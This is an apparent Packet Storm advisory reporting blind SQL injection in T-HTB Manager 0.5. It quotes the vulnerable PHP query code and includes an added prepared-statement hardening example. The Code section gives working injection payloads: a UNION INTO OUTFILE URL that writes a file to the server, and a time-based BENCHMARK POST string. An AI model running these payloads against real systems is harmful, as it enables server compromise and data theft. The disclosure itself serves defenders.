T-HTB Manager 0.5 Blind SQL Injection

2009-09-10T00:00:00
ID PACKETSTORM:81164
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-09-10T00:00:00

Description

******** Salvatore "drosophila" Fresta ********  
  
[+] Application: T-HTB Manager  
[+] Version: 0.5  
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page  
  
[+] Bugs: [A] Multiple Blind SQL Injection  
  
[+] Exploitation: Remote  
[+] Date: 10 Sep 2009  
  
[+] Discovered by: Salvatore Fresta aka drosophila  
[+] Author: Salvatore Fresta aka drosophila  
[+] E-mail: drosophilaxxx [at] gmail.com  
  
  
***************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
***************************************************  
  
[+] Bugs  
  
  
- [A] Multiple Blind SQL Injection  
  
[-] Risk: medium  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: index.php  
  
None of the fields in this script are sanitized, but the  
query results are never returned to the client, so the  
injection is blind.  
  
...  
  
case 'delete_category':  
$id = $_GET['id'];  
$id_interfaces = $_GET['id_interfaces'];  
  
if($id>0)  
{  
$query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";  
$db_query = mysql_query($query);  
  
...  
  
case 'update_category':  
$name = $_POST['name'];  
$id = $_POST['id'];  
  
$rate = $_POST['rate'];  
$ceil = $_POST['ceil'];  
$burst = $_POST['burst'];  
$prio = $_POST['prio'];  
$monitor = $_POST['monitor'];  
  
if(strlen($name)>0 && $id>0)  
{  
$nodelft = $_POST['nodelft'];  
  
$lft = $_POST['lft'];  
$rgt = $_POST['rgt'];  
  
$query = "UPDATE ".$table_name." set name='" . $name . "' , lft='" . $lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";  
  
...  
  
And many others.  
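A hardened form of the two handlers quoted above, added here as an example and not part of this advisory or of T-HTB Manager's code: id is validated as an integer and every request value reaches MySQL only as a bound parameter, so neither the quote breakout in delete_category nor a trailing WHERE clause in update_category is ever parsed as SQL, and the result no longer depends on magic_quotes_gpc. It assumes an open mysqli connection in $mysqli, that $table_name comes from configuration rather than the request, the column names from the original UPDATE, and an allow-listed table name that is a placeholder.

```php
<?php
// Added hardening example, not T-HTB Manager's own code. Assumes an open
// mysqli connection in $mysqli and a configuration-supplied $table_name.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on SQL errors

// A table name cannot be a bound parameter, so check it against a fixed
// allow-list (placeholder name below) before interpolating it as an identifier.
function safeTableName(string $table_name): string {
    $allowed = ['categories'];               // assumption: the app's real table
    if (!in_array($table_name, $allowed, true)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    return '`' . $table_name . '`';
}

// delete_category: id must be a positive integer; a value carrying a quote
// or a UNION tail fails validation before any SQL is built.
function lookupCategoryBounds(mysqli $mysqli, string $table_name, $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false || $id <= 0) {
        return null;
    }
    $stmt = $mysqli->prepare('SELECT rgt, lft FROM ' . safeTableName($table_name) . ' WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($rgt, $lft);
    $row = $stmt->fetch() ? ['rgt' => $rgt, 'lft' => $lft] : null;
    $stmt->close();
    return $row;
}

// update_category: every field is a bound parameter. Values are bound as
// strings, mirroring the quoted columns in the original query, so a name
// such as "blabla' WHERE 1=0 ..." is stored literally, never executed.
function updateCategory(mysqli $mysqli, string $table_name, array $post): bool {
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    $f = [];
    foreach (['name', 'lft', 'rgt', 'rate', 'ceil', 'burst', 'prio', 'monitor'] as $k) {
        $f[$k] = (string)($post[$k] ?? '');
    }
    if ($id === false || $id <= 0 || strlen($f['name']) === 0) {
        return false;
    }
    $stmt = $mysqli->prepare('UPDATE ' . safeTableName($table_name)
        . ' SET name = ?, lft = ?, rgt = ?, rate = ?, ceil = ?, burst = ?, prio = ?, monitor = ? WHERE id = ?');
    $stmt->bind_param('ssssssssi', $f['name'], $f['lft'], $f['rgt'], $f['rate'],
                      $f['ceil'], $f['burst'], $f['prio'], $f['monitor'], $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

If the real columns are numeric, tighten the string bindings to FILTER_VALIDATE_INT checks and 'i' types; the prepared statement already prevents injection either way.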
  
  
***************************************************  
  
[+] Code  
  
  
- [A] Multiple Blind SQL Injection  
  
This is a blind SQL injection, and the database holds no  
particularly sensitive information such as usernames or  
passwords. However, the injection can be used to write  
arbitrary files on the server (when the database user is  
allowed to).  
  
http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php  
  
Send the following as a POST request:  
  
action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23  
  
  
***************************************************  
  
[+] Fix  
  
No fix.  
  
  
***************************************************